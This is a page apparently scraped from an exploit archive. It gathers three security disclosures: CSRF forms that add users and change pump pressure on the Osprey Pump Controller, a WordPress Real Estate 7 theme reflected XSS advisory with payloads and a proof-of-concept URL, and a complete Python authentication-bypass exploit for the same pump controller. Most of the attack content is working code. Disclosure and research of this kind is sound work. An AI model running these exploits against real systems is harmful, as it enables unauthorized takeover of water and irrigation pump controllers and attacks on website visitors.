CSRF Add User:--------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="test" />      <input type="hidden" name="sysTextName" value="USERNAME1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="ZSL" />      <input type="submit" value="Add user" />    </form>  </body></html>CSRF Set Password:------------------<html>  <body>    <form action="http://TARGET/setSystemText.php">      <input type="hidden" name="sysTextValue" value="pass" />      <input type="hidden" name="sysTextName" value="USERPW1" />      <input type="hidden" name="backTargetLinkNumber" value="75" />      <input type="hidden" name="userName" value="t00t" />      <input type="submit" value="Set pass" />    </form>  </body></html>CSRF Set System Pressure Raw:-----------------------------<html>  <body>    <form action="http://TARGET/mbSetRegister_Int.php">      <input type="hidden" name="regValue" value="17301" />      <input type="hidden" name="regAddress" value="40900" />      <input type="hidden" name="minValue" value="0" />      <input type="hidden" name="maxValue" value="32767" />      <input type="hidden" name="backTargetLinkNumber" value="414" />      <input type="hidden" name="userName" value="w00t" />      <input type="submit" value="Modify pressure" />    </form>  </body></html>

Osprey Pump Controller 1.0.1 Cross Site Request Forgery

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from a cross site scripting vulnerability.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)Google Dork:         inurl:/wp-content/themes/realestate-7/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    Contempo Themes [ https://contempothemes.com ]Vulnerable Version:  <= 3.3.4Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778CVSS Base Score:     6.1 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NOWASP Top 10:        A7: Cross-Site Scripting (XSS)CWE:                 CWE-79CVE:                 TBA=================================================================================================#### [ Description: ]The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.#### [ Impact: ]Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.#### [ Payloads: ]```<img src=x onerror=(alert)(`FearZzZz`);>``````<svg/onload=alert(`FearZzZz`)>```#### [ Proof-of-Concept: ]https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3EGET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2Host: elementor3.contempothemes.com#### [ Timeline: ]2023.02.08 - Real Estate 7 Theme v3.3.4 released.2023.02.10 - Vulnerability has been discovered.2023.02.13 - Vendor notified, received a quick response.2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

Osprey Pump Controller version 1.0.1 allows an unauthenticated attacker to create an account and bypass authentication, thereby gaining unauthorized access to the system.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Authentication Bypass Credentials Modification### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: A vulnerability has been discovered in the web panel of Osprey pump# controller that allows an unauthenticated attacker to create an account# and bypass authentication, thereby gaining unauthorized access to the# system. The vulnerability stems from a lack of proper authentication# checks during the account creation process, which allows an attacker# to create a user account without providing valid credentials. An attacker# who successfully exploits this vulnerability can gain access to the pump# controller's web panel, and cause disruption in operation, modify data,# change other usernames and passwords, or even shut down the controller# entirely.## The attacker can leverage their unauthorized access to the# system to carry out a variety of malicious activities, including:# Modifying pump settings, such as flow rates or pressure levels, causing# damage or loss of control, stealing sensitive data, such as system logs# or customer information, changing passwords and other user credentials,# potentially locking out legitimate users or allowing the attacker to# maintain persistent access to the system, disabling or shutting down# the controller entirely, potentially causing significant disruption to# operations and service delivery.## ----------------------------------------------------------------------# $ ./accpump.py 192.168.0.25 root rewt# [ ok ]# [ ok ]# Login with 'root:rewt' -> Register Access Menu.# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5752# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5752.php### 05.01.2023#import requestsimport sys as sif len(s.argv)!=4:    print("Osprey Pump Controller Bypass Exploit")    print("Arguments: [host] [username] [password]")    exit(-3)else:    url=s.argv[1]    usr=s.argv[2]    pwd=s.argv[3]    if not "http" in url:        url="http://{}".format(url)## Data names .  Values## USERNAME0  .  user# USERNAME1  .# USERNAME2  .# USERNAME3  .# USERNAME4  .# USERPW0    .  1234# USERPW1    .# USERPW2    .# USERPW3    .# USERPW4    .#url+="/"url+="setSystemText"url+=".php"paru={"sysTextValue"        :usr,      "sysTextName"         :"USERNAME3",      "backTargetLinkNumber":75,      "userName"            :"ZSL"}parp={"sysTextValue"        :pwd,      "sysTextName"         :"USERPW3",      "backTargetLinkNumber":75,      "userName"            :"WriteExploit"}r=requests.get(url,params=paru)if 'System String "USERNAME3" set' in r.text:    print("[ ok ]")else:    print(f"Error: {r.status_code} {r.reason} - {r.text}")r=requests.get(url,params=parp)if 'System String "USERPW3" set' in r.text:    print("[ ok ]")    print(f"Login with '{usr}:{pwd}' ",end="")    print("-> Register Access Menu.")else:    print(f"Error: {r.status_code} {r.reason} - {r.text}")

Source

Packet Storm